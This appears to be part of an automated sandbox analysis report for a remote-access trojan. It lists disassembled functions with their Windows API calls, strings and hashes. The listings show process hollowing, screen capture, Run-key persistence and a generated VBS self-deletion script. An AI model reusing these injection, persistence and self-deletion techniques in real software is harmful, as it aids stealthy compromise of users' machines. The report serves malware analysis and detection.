                                                  • Opcode Fuzzy Hash: ee7560bd864c47a473b03ccd03fab4bf0c670c3a92a751b3696d255e79ff2f15
                                                  • Instruction Fuzzy Hash: 45E0EC31745320EFC3206B609C49F9B6AA4DF85B52F05443AB905BB2E5DB78CC4086AD
                                                  Function 0044E8F9 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 114COMMON
                                                  Download Yara Rule
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 0000000B.00000002.4499091602.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID:
                                                  • String ID: .
                                                  • API String ID: 0-248832578
                                                  • Opcode ID: dab0a497b08e8df346a97c8899a5e14908918034842a488b938a10d87d6eec82
                                                  • Instruction ID: 7baa6cf80f4bdea99dbc4d330b45aada8194c6230f36d830dc1b60d3871032d3
                                                  • Opcode Fuzzy Hash: dab0a497b08e8df346a97c8899a5e14908918034842a488b938a10d87d6eec82
                                                  • Instruction Fuzzy Hash: DF3107B1900259AFEB24DE7ACC84EFB7BBDEB46318F0401AEF41897291E6349D418B54
                                                  Function 004520B6 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 42COMMONLIBRARYCODE
                                                  Download Yara Rule
                                                  APIs
                                                    • Part of subcall function 00448295: GetLastError.KERNEL32(00000020,?,0043A875,?,?,?,0043F9F8,?,?,00000020,00000000,?,?,?,0042DD92,0000003B), ref: 00448299
                                                    • Part of subcall function 00448295: _free.LIBCMT ref: 004482CC
                                                    • Part of subcall function 00448295: SetLastError.KERNEL32(00000000,0043F9F8,?,?,00000020,00000000,?,?,?,0042DD92,0000003B,?,00000041,00000000,00000000), ref: 0044830D
                                                    • Part of subcall function 00448295: _abort.LIBCMT ref: 00448313
                                                  • EnumSystemLocalesW.KERNEL32(00452393,00000001,?,?,JD,?,00452734,JD,?,?,?,?,?,00444AED,?,?), ref: 00452102
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 0000000B.00000002.4499091602.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: ErrorLast$EnumLocalesSystem_abort_free
                                                  • String ID: JD
                                                  • API String ID: 1084509184-2669065882
                                                  • Opcode ID: 43afbb6a7401c46fb6bd1099fc40b6d5da7848bdbd3577d5ff827f5c50c4ae4e
                                                  • Instruction ID: 883a99871793c155097d9da94a803295819168bd30f8f35cc04eca091e96b9f4
                                                  • Opcode Fuzzy Hash: 43afbb6a7401c46fb6bd1099fc40b6d5da7848bdbd3577d5ff827f5c50c4ae4e
                                                  • Instruction Fuzzy Hash: E8F0FF363007056FDB245F399881A6B7B96FB82769B04482EFE458B682DAB99C42D604
                                                  Function 0044896D Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 37COMMONLIBRARYCODE
                                                  Download Yara Rule
                                                  APIs
                                                  • GetLocaleInfoW.KERNEL32(00000000,00000002,00000000,?,20001004,?,20001004,?,00000002,?,?,?,?,00000004), ref: 004489C0
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 0000000B.00000002.4499091602.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: InfoLocale
                                                  • String ID: GetLocaleInfoEx
                                                  • API String ID: 2299586839-2904428671
                                                  • Opcode ID: 53574c2ecf56bfb558b2c309ca3eb91f9c7a0a18e0f2245662e0b0bedf18becb
                                                  • Instruction ID: 58f0578312c774904006f9ed4749830948a62bec6dc8fde4d932476f73229d15
                                                  • Opcode Fuzzy Hash: 53574c2ecf56bfb558b2c309ca3eb91f9c7a0a18e0f2245662e0b0bedf18becb
                                                  • Instruction Fuzzy Hash: C0F0F631640608FBDB016F61DC06F6E7B25EB04751F00056EFC0966251DE368D2096DE
                                                  Function 004120B2 Relevance: 2.6, APIs: 2, Instructions: 55memoryCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • GetProcessHeap.KERNEL32(00000000,00000000,?,00000000,00411F72,?,?,?,?,?), ref: 00412122
                                                  • HeapFree.KERNEL32(00000000,?,?,?,?,?), ref: 00412129
                                                  Memory Dump Source
                                                  • Source File: 0000000B.00000002.4499091602.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: Heap$FreeProcess
                                                  • String ID:
                                                  • API String ID: 3859560861-0
                                                  • Opcode ID: 5801a203d1619bed6c8a9db4d4e6f7c09651a2c1722533c7d7743465b50f68e9
                                                  • Instruction ID: dd486cb6b879bf1be37f4e59d5b3b18419fca2aff5c7e471244091183f2ba527
                                                  • Opcode Fuzzy Hash: 5801a203d1619bed6c8a9db4d4e6f7c09651a2c1722533c7d7743465b50f68e9
                                                  • Instruction Fuzzy Hash: 0D113632000B11AFC7309F54DE85957BBEAFF08715305892EF29682922CB75FCA0CB48
                                                  Function 00434CB6 Relevance: 1.6, APIs: 1, Instructions: 134COMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • IsProcessorFeaturePresent.KERNEL32(0000000A,00000000), ref: 00434CCF
                                                  Memory Dump Source
                                                  • Source File: 0000000B.00000002.4499091602.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: FeaturePresentProcessor
                                                  • String ID:
                                                  • API String ID: 2325560087-0
                                                  • Opcode ID: 4259bdeace04940204f61aa74a979230364aaba3051b8f8e0efcae6fb7ed6494
                                                  • Instruction ID: 5e37b39ef68b784d6588b9ddffa6793edf4c3ade0924e8be62ba08be237937aa
                                                  • Opcode Fuzzy Hash: 4259bdeace04940204f61aa74a979230364aaba3051b8f8e0efcae6fb7ed6494
                                                  • Instruction Fuzzy Hash: E4515B71D002488FEB24CF69D98579EBBF4FB88314F24956BD419EB264D378A940CF98
                                                  Function 00452393 Relevance: 1.6, APIs: 1, Instructions: 83COMMON
                                                  Download Yara Rule
                                                  APIs
                                                    • Part of subcall function 00448295: GetLastError.KERNEL32(00000020,?,0043A875,?,?,?,0043F9F8,?,?,00000020,00000000,?,?,?,0042DD92,0000003B), ref: 00448299
                                                    • Part of subcall function 00448295: _free.LIBCMT ref: 004482CC
                                                    • Part of subcall function 00448295: SetLastError.KERNEL32(00000000,0043F9F8,?,?,00000020,00000000,?,?,?,0042DD92,0000003B,?,00000041,00000000,00000000), ref: 0044830D
                                                    • Part of subcall function 00448295: _abort.LIBCMT ref: 00448313
                                                    • Part of subcall function 00448295: _free.LIBCMT ref: 004482F4
                                                    • Part of subcall function 00448295: SetLastError.KERNEL32(00000000,0043F9F8,?,?,00000020,00000000,?,?,?,0042DD92,0000003B,?,00000041,00000000,00000000), ref: 00448301
                                                  • GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 004523E7
                                                  Memory Dump Source
                                                  • Source File: 0000000B.00000002.4499091602.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: ErrorLast$_free$InfoLocale_abort
                                                  • String ID:
                                                  • API String ID: 1663032902-0
                                                  • Opcode ID: b4047fd74fafd511f87100a415ff7352fa71784cc782813174b617cf7262d9f7
                                                  • Instruction ID: 2d4dd0c1c30cd12b50dfb53a4a1f7f5f9091958bb121381f53cce851c87d7921
                                                  • Opcode Fuzzy Hash: b4047fd74fafd511f87100a415ff7352fa71784cc782813174b617cf7262d9f7
                                                  • Instruction Fuzzy Hash: F921D632600606ABDB249F25DD41FBB73A8EB06316F10407FED01D6152EBBC9D48CB59
                                                  Function 004525C3 Relevance: 1.5, APIs: 1, Instructions: 46COMMON
                                                  Download Yara Rule
                                                  APIs
                                                    • Part of subcall function 00448295: GetLastError.KERNEL32(00000020,?,0043A875,?,?,?,0043F9F8,?,?,00000020,00000000,?,?,?,0042DD92,0000003B), ref: 00448299
                                                    • Part of subcall function 00448295: _free.LIBCMT ref: 004482CC
                                                    • Part of subcall function 00448295: SetLastError.KERNEL32(00000000,0043F9F8,?,?,00000020,00000000,?,?,?,0042DD92,0000003B,?,00000041,00000000,00000000), ref: 0044830D
                                                    • Part of subcall function 00448295: _abort.LIBCMT ref: 00448313
                                                  • GetLocaleInfoW.KERNEL32(?,20000001,?,00000002,?,00000000,?,?,00452361,00000000,00000000,?), ref: 004525EF
                                                  Memory Dump Source
                                                  • Source File: 0000000B.00000002.4499091602.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: ErrorLast$InfoLocale_abort_free
                                                  • String ID:
                                                  • API String ID: 2692324296-0
                                                  • Opcode ID: 1fdc73b6016995a7e39b97608f5a3b1d34212a550219c51fc6701dbba91f5541
                                                  • Instruction ID: 8c29d710edde3bbc403447a64c1727e90569dbd09ff88c71ffccea9529c81983
                                                  • Opcode Fuzzy Hash: 1fdc73b6016995a7e39b97608f5a3b1d34212a550219c51fc6701dbba91f5541
                                                  • Instruction Fuzzy Hash: C4F04936A00116BBDB245A24D905BBF7B58EB01315F04446BEC05A3241FAF8FD058694
                                                  Function 00448484 Relevance: 1.5, APIs: 1, Instructions: 34COMMONLIBRARYCODE
                                                  Download Yara Rule
                                                  APIs
                                                    • Part of subcall function 00445909: EnterCriticalSection.KERNEL32(-0006D41D,?,0044305C,00000000,0046E938,0000000C,00443017,?,?,?,00445BA7,?,?,0044834A,00000001,00000364), ref: 00445918
                                                  • EnumSystemLocalesW.KERNEL32(0044843E,00000001,0046EAE0,0000000C), ref: 004484BC
                                                  Memory Dump Source
                                                  • Source File: 0000000B.00000002.4499091602.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: CriticalEnterEnumLocalesSectionSystem
                                                  • String ID:
                                                  • API String ID: 1272433827-0
                                                  • Opcode ID: 08771b5932cf67d2f7a499a1ea32343f451e1cff339441a182db03018af17ba2
                                                  • Instruction ID: 901ea181f65c0ebd25502bb0be635eecd519ab6688482fb1bf3a60b9f01fb263
                                                  • Opcode Fuzzy Hash: 08771b5932cf67d2f7a499a1ea32343f451e1cff339441a182db03018af17ba2
                                                  • Instruction Fuzzy Hash: 37F04F76A50200EFEB00EF69D946B4D37E0FB04725F10446EF514DB2A2DB7899809B49
                                                  Function 00451FD0 Relevance: 1.5, APIs: 1, Instructions: 31COMMONLIBRARYCODE
                                                  Download Yara Rule
                                                  APIs
                                                    • Part of subcall function 00448295: GetLastError.KERNEL32(00000020,?,0043A875,?,?,?,0043F9F8,?,?,00000020,00000000,?,?,?,0042DD92,0000003B), ref: 00448299
                                                    • Part of subcall function 00448295: _free.LIBCMT ref: 004482CC
                                                    • Part of subcall function 00448295: SetLastError.KERNEL32(00000000,0043F9F8,?,?,00000020,00000000,?,?,?,0042DD92,0000003B,?,00000041,00000000,00000000), ref: 0044830D
                                                    • Part of subcall function 00448295: _abort.LIBCMT ref: 00448313
                                                  • EnumSystemLocalesW.KERNEL32(00451F27,00000001,?,?,?,00452792,JD,?,?,?,?,?,00444AED,?,?,?), ref: 00452007
                                                  Memory Dump Source
                                                  • Source File: 0000000B.00000002.4499091602.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: ErrorLast$EnumLocalesSystem_abort_free
                                                  • String ID:
                                                  • API String ID: 1084509184-0
                                                  • Opcode ID: 06cdaad2b1dd0330ee545a4703de2c72ad4f4425d90ac6c7aa7d45dfeb8c5d5b
                                                  • Instruction ID: 16a122e2f6617649f53ffd93528404cf76eb0d70ff9257d35f530b0535ef024d
                                                  • Opcode Fuzzy Hash: 06cdaad2b1dd0330ee545a4703de2c72ad4f4425d90ac6c7aa7d45dfeb8c5d5b
                                                  • Instruction Fuzzy Hash: 84F0203630020597CB04AF75D845B6A7F90EB82729B06009AFE058B6A2C7799842C754
                                                  Function 0040F90C Relevance: 1.5, APIs: 1, Instructions: 20COMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • GetLocaleInfoA.KERNEL32(00000800,0000005A,00000000,00000003,?,?,?,00415537,00474EE0,00475A00,00474EE0,00000000,00474EE0,00000000,00474EE0,5.1.3 Pro), ref: 0040F920
                                                  Memory Dump Source
                                                  • Source File: 0000000B.00000002.4499091602.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: InfoLocale
                                                  • String ID:
                                                  • API String ID: 2299586839-0
                                                  • Opcode ID: 6e7e1272b5dd4961ec291f7251087c477c276ff70ea579fe19356fd9f5958aa4
                                                  • Instruction ID: 54543d52817102a935349e0949155b160d3bd36039d058f0142c014f19b14c2e
                                                  • Opcode Fuzzy Hash: 6e7e1272b5dd4961ec291f7251087c477c276ff70ea579fe19356fd9f5958aa4
                                                  • Instruction Fuzzy Hash: D5D05B3074421C77D61096959D0AEAA779CD701B52F0001A6BB05D72C0D9E15E0087D1
                                                  Function 00434BD8 Relevance: 1.5, APIs: 1, Instructions: 3COMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • SetUnhandledExceptionFilter.KERNEL32(Function_00034BE4,0043490B), ref: 00434BDD
                                                  Memory Dump Source
                                                  • Source File: 0000000B.00000002.4499091602.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: ExceptionFilterUnhandled
                                                  • String ID:
                                                  • API String ID: 3192549508-0
                                                  • Opcode ID: 2ffe05228c785604148d814c7fc250910b5f8136668f43492b8067ac5164d55b
                                                  • Instruction ID: 702e07acd891e046c8aea5fc6397425f5e3bd38ef0af78e1c7fed93ac6412050
                                                  • Opcode Fuzzy Hash: 2ffe05228c785604148d814c7fc250910b5f8136668f43492b8067ac5164d55b
                                                  • Instruction Fuzzy Hash:
                                                  Function 00418EB1 Relevance: 49.3, APIs: 27, Strings: 1, Instructions: 328windowmemoryCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • CreateDCA.GDI32(DISPLAY,00000000,00000000,00000000), ref: 00418ECB
                                                  • CreateCompatibleDC.GDI32(00000000), ref: 00418ED8
                                                    • Part of subcall function 00419360: EnumDisplaySettingsW.USER32(?,000000FF,?), ref: 00419390
                                                  • CreateCompatibleBitmap.GDI32(00000000,?), ref: 00418F4E
                                                  • DeleteDC.GDI32(00000000), ref: 00418F65
                                                  • DeleteDC.GDI32(00000000), ref: 00418F68
                                                  • DeleteObject.GDI32(00000000), ref: 00418F6B
                                                  • SelectObject.GDI32(00000000,00000000), ref: 00418F8C
                                                  • DeleteDC.GDI32(00000000), ref: 00418F9D
                                                  • DeleteDC.GDI32(00000000), ref: 00418FA0
                                                  • StretchBlt.GDI32(00000000,00000000,00000000,?,?,00000000,?,?,?,?,00CC0020), ref: 00418FC4
                                                  • GetIconInfo.USER32(?,?), ref: 00418FF8
                                                  • DeleteObject.GDI32(?), ref: 00419027
                                                  • DeleteObject.GDI32(?), ref: 00419034
                                                  • DrawIcon.USER32(00000000,?,?,?), ref: 00419041
                                                  • BitBlt.GDI32(00000000,00000000,00000000,?,?,?,00000000,00000000,00660046), ref: 00419077
                                                  • GetObjectA.GDI32(00000000,00000018,?), ref: 004190A3
                                                  • LocalAlloc.KERNEL32(00000040,00000001), ref: 00419110
                                                  • GlobalAlloc.KERNEL32(00000000,?), ref: 0041917F
                                                  • GetDIBits.GDI32(00000000,00000000,00000000,?,00000000,00000000,00000000), ref: 004191A3
                                                  • DeleteDC.GDI32(?), ref: 004191B7
                                                  • DeleteDC.GDI32(00000000), ref: 004191BA
                                                  • DeleteObject.GDI32(00000000), ref: 004191BD
                                                  • GlobalFree.KERNEL32(?), ref: 004191C8
                                                  • DeleteObject.GDI32(00000000), ref: 0041927C
                                                  • GlobalFree.KERNEL32(?), ref: 00419283
                                                  • DeleteDC.GDI32(?), ref: 00419293
                                                  • DeleteDC.GDI32(00000000), ref: 0041929E
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 0000000B.00000002.4499091602.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: Delete$Object$CreateGlobal$AllocCompatibleFreeIcon$BitmapBitsDisplayDrawEnumInfoLocalSelectSettingsStretch
                                                  • String ID: DISPLAY
                                                  • API String ID: 479521175-865373369
                                                  • Opcode ID: 7c8983c53be72e5ee4313047db9d93c3c673d7ce03baff72bd223da92b172140
                                                  • Instruction ID: e1b8f987aa81746083de8242de432fb1856ba331ec6d7e725e66c1191a76d441
                                                  • Opcode Fuzzy Hash: 7c8983c53be72e5ee4313047db9d93c3c673d7ce03baff72bd223da92b172140
                                                  • Instruction Fuzzy Hash: 64C14C71504301AFD720DF25DC48BABBBE9EB88715F04482EF98993291DB34ED45CB6A
                                                  Function 0041812A Relevance: 47.5, APIs: 22, Strings: 5, Instructions: 289libraryloaderthreadCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • GetModuleHandleA.KERNEL32(ntdll,ZwCreateSection,00000000,00000000), ref: 00418171
                                                  • GetProcAddress.KERNEL32(00000000), ref: 00418174
                                                  • GetModuleHandleA.KERNEL32(ntdll,ZwMapViewOfSection), ref: 00418185
                                                  • GetProcAddress.KERNEL32(00000000), ref: 00418188
                                                  • GetModuleHandleA.KERNEL32(ntdll,ZwUnmapViewOfSection), ref: 00418199
                                                  • GetProcAddress.KERNEL32(00000000), ref: 0041819C
                                                  • GetModuleHandleA.KERNEL32(ntdll,ZwClose), ref: 004181AD
                                                  • GetProcAddress.KERNEL32(00000000), ref: 004181B0
                                                  • CreateProcessW.KERNEL32(00000000,?,00000000,00000000,00000000,00000004,00000000,00000000,?,?), ref: 00418252
                                                  • VirtualAlloc.KERNEL32(00000000,00000004,00001000,00000004), ref: 0041826A
                                                  • GetThreadContext.KERNEL32(?,00000000), ref: 00418280
                                                  • ReadProcessMemory.KERNEL32(?,?,?,00000004,?), ref: 004182A6
                                                  • VirtualFree.KERNEL32(00000000,00000000,00008000), ref: 00418328
                                                  • TerminateProcess.KERNEL32(?,00000000), ref: 0041833C
                                                  • GetCurrentProcess.KERNEL32(?,00000000,00000000,00000000,?,00000001,00000000,00000040), ref: 0041837C
                                                  • WriteProcessMemory.KERNEL32(?,?,?,00000004,00000000), ref: 00418446
                                                  • SetThreadContext.KERNEL32(?,00000000), ref: 00418463
                                                  • ResumeThread.KERNEL32(?), ref: 00418470
                                                  • VirtualFree.KERNEL32(00000000,00000000,00008000), ref: 00418487
                                                  • GetCurrentProcess.KERNEL32(?), ref: 00418492
                                                  • TerminateProcess.KERNEL32(?,00000000), ref: 004184AD
                                                  • GetLastError.KERNEL32 ref: 004184B5
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 0000000B.00000002.4499091602.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: Process$AddressHandleModuleProc$ThreadVirtual$ContextCurrentFreeMemoryTerminate$AllocCreateErrorLastReadResumeWrite
                                                  • String ID: ZwClose$ZwCreateSection$ZwMapViewOfSection$ZwUnmapViewOfSection$ntdll
                                                  • API String ID: 4188446516-3035715614
                                                  • Opcode ID: c823a5a523639eb235f5adfe7c5fce7303d6972b4bd708db87ed0c766a231877
                                                  • Instruction ID: d7ba82c79e3f17b97bd8f2c1aaed993f07984c16d96ff77cb9dc1491e823fc6f
                                                  • Opcode Fuzzy Hash: c823a5a523639eb235f5adfe7c5fce7303d6972b4bd708db87ed0c766a231877
                                                  • Instruction Fuzzy Hash: 69A15FB0604305AFDB209F64DD85B6B7BE8FF48705F00482EF685D6291EB78D844CB59
                                                  Function 0040D45B Relevance: 45.8, APIs: 6, Strings: 20, Instructions: 282registryCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                    • Part of subcall function 0041288B: TerminateProcess.KERNEL32(00000000,pth_unenc,0040F903), ref: 0041289B
                                                    • Part of subcall function 0041288B: WaitForSingleObject.KERNEL32(000000FF), ref: 004128AE
                                                  • GetModuleFileNameW.KERNEL32(00000000,?,00000208,?,?,00000000), ref: 0040D558
                                                  • RegDeleteKeyA.ADVAPI32(80000001,00000000), ref: 0040D56B
                                                  • SetFileAttributesW.KERNEL32(?,00000080,?,?,00000000), ref: 0040D584
                                                  • SetFileAttributesW.KERNEL32(00000000,00000080,?,?,00000000), ref: 0040D5B4
                                                    • Part of subcall function 0040B8E7: TerminateThread.KERNEL32(0040A2B8,00000000,004752F0,pth_unenc,0040D0F3,004752D8,004752F0,?,pth_unenc), ref: 0040B8F6
                                                    • Part of subcall function 0040B8E7: UnhookWindowsHookEx.USER32(004750F0), ref: 0040B902
                                                    • Part of subcall function 0040B8E7: TerminateThread.KERNEL32(Function_0000A2A2,00000000,?,pth_unenc), ref: 0040B910
                                                    • Part of subcall function 0041C482: CreateFileW.KERNEL32(00000000,40000000,00000000,00000000,00000002,00000080,00000000,00000000,00000000,00466478,00000000,00000000,0040D434,00000000,00000000,fso.DeleteFile(Wscript.ScriptFullName)), ref: 0041C4C1
                                                  • ShellExecuteW.SHELL32(00000000,open,00000000,00466478,00466478,00000000), ref: 0040D7FF
                                                  • ExitProcess.KERNEL32 ref: 0040D80B
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 0000000B.00000002.4499091602.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: File$Terminate$AttributesProcessThread$CreateDeleteExecuteExitHookModuleNameObjectShellSingleUnhookWaitWindows
                                                  • String ID: """, 0$")$8SG$@qF$@qF$CreateObject("WScript.Shell").Run "cmd /c ""$On Error Resume Next$Set fso = CreateObject("Scripting.FileSystemObject")$Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run\$Software\Microsoft\Windows\CurrentVersion\Run\$Temp$\update.vbs$dMG$exepath$fso.DeleteFile "$fso.DeleteFile(Wscript.ScriptFullName)$fso.DeleteFolder "$open$wend$while fso.FileExists("
                                                  • API String ID: 1861856835-1447701601
                                                  • Opcode ID: 5d2ec2f2100dd23cc365e5a044f7fac0ce6a70abfbf1c55e622674ec0d54512f
                                                  • Instruction ID: 9f807323933333198641953f201c1fc8368d74e19fdabe041c5449f7db564f80
                                                  • Opcode Fuzzy Hash: 5d2ec2f2100dd23cc365e5a044f7fac0ce6a70abfbf1c55e622674ec0d54512f
                                                  • Instruction Fuzzy Hash: 8791B0716082005AC315FB62D8529AF77A8AFD4309F10443FB64AA71E3EF7C9D49C65E
                                                  Function 0040D0D1 Relevance: 42.3, APIs: 6, Strings: 18, Instructions: 260registryCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                    • Part of subcall function 0041288B: TerminateProcess.KERNEL32(00000000,pth_unenc,0040F903), ref: 0041289B
                                                    • Part of subcall function 0041288B: WaitForSingleObject.KERNEL32(000000FF), ref: 004128AE
                                                  • GetModuleFileNameW.KERNEL32(00000000,?,00000208,?,?,?,?,?,004752F0,?,pth_unenc), ref: 0040D1E0
                                                  • RegDeleteKeyA.ADVAPI32(80000001,00000000), ref: 0040D1F3
                                                  • SetFileAttributesW.KERNEL32(00000000,00000080,?,?,?,?,?,004752F0,?,pth_unenc), ref: 0040D223
                                                  • SetFileAttributesW.KERNEL32(?,00000080,?,?,?,?,?,004752F0,?,pth_unenc), ref: 0040D232
                                                    • Part of subcall function 0040B8E7: TerminateThread.KERNEL32(0040A2B8,00000000,004752F0,pth_unenc,0040D0F3,004752D8,004752F0,?,pth_unenc), ref: 0040B8F6
                                                    • Part of subcall function 0040B8E7: UnhookWindowsHookEx.USER32(004750F0), ref: 0040B902
                                                    • Part of subcall function 0040B8E7: TerminateThread.KERNEL32(Function_0000A2A2,00000000,?,pth_unenc), ref: 0040B910
                                                    • Part of subcall function 0041BA09: GetCurrentProcessId.KERNEL32(00000000,6C7C8300,00000000,?,?,?,?,00466478,0040D248,.vbs,?,?,?,?,?,004752F0), ref: 0041BA30
                                                  • ShellExecuteW.SHELL32(00000000,open,00000000,00466478,00466478,00000000), ref: 0040D44D
                                                  • ExitProcess.KERNEL32 ref: 0040D454
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 0000000B.00000002.4499091602.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: FileProcessTerminate$AttributesThread$CurrentDeleteExecuteExitHookModuleNameObjectShellSingleUnhookWaitWindows
                                                  • String ID: ")$.vbs$8SG$On Error Resume Next$Set fso = CreateObject("Scripting.FileSystemObject")$Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run\$Software\Microsoft\Windows\CurrentVersion\Run\$Temp$dMG$exepath$fso.DeleteFile "$fso.DeleteFile(Wscript.ScriptFullName)$fso.DeleteFolder "$open$pth_unenc$wend$while fso.FileExists("$xpF
                                                  • API String ID: 3797177996-2483056239
                                                  • Opcode ID: 2ee98ea0d0f3863be26643997f5fff8c6a28cb97601397e967d1afa7fe61d675
                                                  • Instruction ID: f7f00373e35faeae073ffedb9d5543756e5675edee5c5b567d0d61755fae189b
                                                  • Opcode Fuzzy Hash: 2ee98ea0d0f3863be26643997f5fff8c6a28cb97601397e967d1afa7fe61d675
                                                  • Instruction Fuzzy Hash: 6181AF716082405AC315FB62D8529AF77A8AFD0308F10483FB58A671E3EF7C9E49C65E
                                                  Function 004124B0 Relevance: 40.4, APIs: 17, Strings: 6, Instructions: 190synchronizationsleepfileCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • CreateMutexA.KERNEL32(00000000,00000001,00000000,00000000,004750E4,00000003), ref: 004124CF
                                                  • ExitProcess.KERNEL32(00000000), ref: 004124DB
                                                  • CreateFileW.KERNEL32(?,80000000,00000001,00000000,00000003,00000080,00000000), ref: 00412555
                                                  • OpenProcess.KERNEL32(00100000,00000000,00000000), ref: 00412564
                                                  • WaitForSingleObject.KERNEL32(00000000,000000FF), ref: 0041256F
                                                  • CloseHandle.KERNEL32(00000000), ref: 00412576
                                                  • GetCurrentProcessId.KERNEL32 ref: 0041257C
                                                  • PathFileExistsW.SHLWAPI(?), ref: 004125AD
                                                  • GetTempPathW.KERNEL32(00000104,?), ref: 00412610
                                                  • GetTempFileNameW.KERNEL32(?,temp_,00000000,?), ref: 0041262A
                                                  • lstrcatW.KERNEL32(?,.exe), ref: 0041263C
                                                    • Part of subcall function 0041C482: CreateFileW.KERNEL32(00000000,40000000,00000000,00000000,00000002,00000080,00000000,00000000,00000000,00466478,00000000,00000000,0040D434,00000000,00000000,fso.DeleteFile(Wscript.ScriptFullName)), ref: 0041C4C1
                                                  • ShellExecuteW.SHELL32(00000000,open,?,00000000,00000000,00000001), ref: 0041267C
                                                  • Sleep.KERNEL32(000001F4), ref: 004126BD
                                                  • OpenProcess.KERNEL32(00100000,00000000,00000000), ref: 004126D2
                                                  • WaitForSingleObject.KERNEL32(00000000,000000FF), ref: 004126DD
                                                  • CloseHandle.KERNEL32(00000000), ref: 004126E4
                                                  • GetCurrentProcessId.KERNEL32 ref: 004126EA
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 0000000B.00000002.4499091602.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: Process$File$Create$CloseCurrentHandleObjectOpenPathSingleTempWait$ExecuteExistsExitMutexNameShellSleeplstrcat
                                                  • String ID: .exe$8SG$WDH$exepath$open$temp_
                                                  • API String ID: 2649220323-436679193
                                                  • Opcode ID: 5423d87cc751ed5cfd1d4c8b3581599aeeb643011f75056a7ca0d89747c9c64e
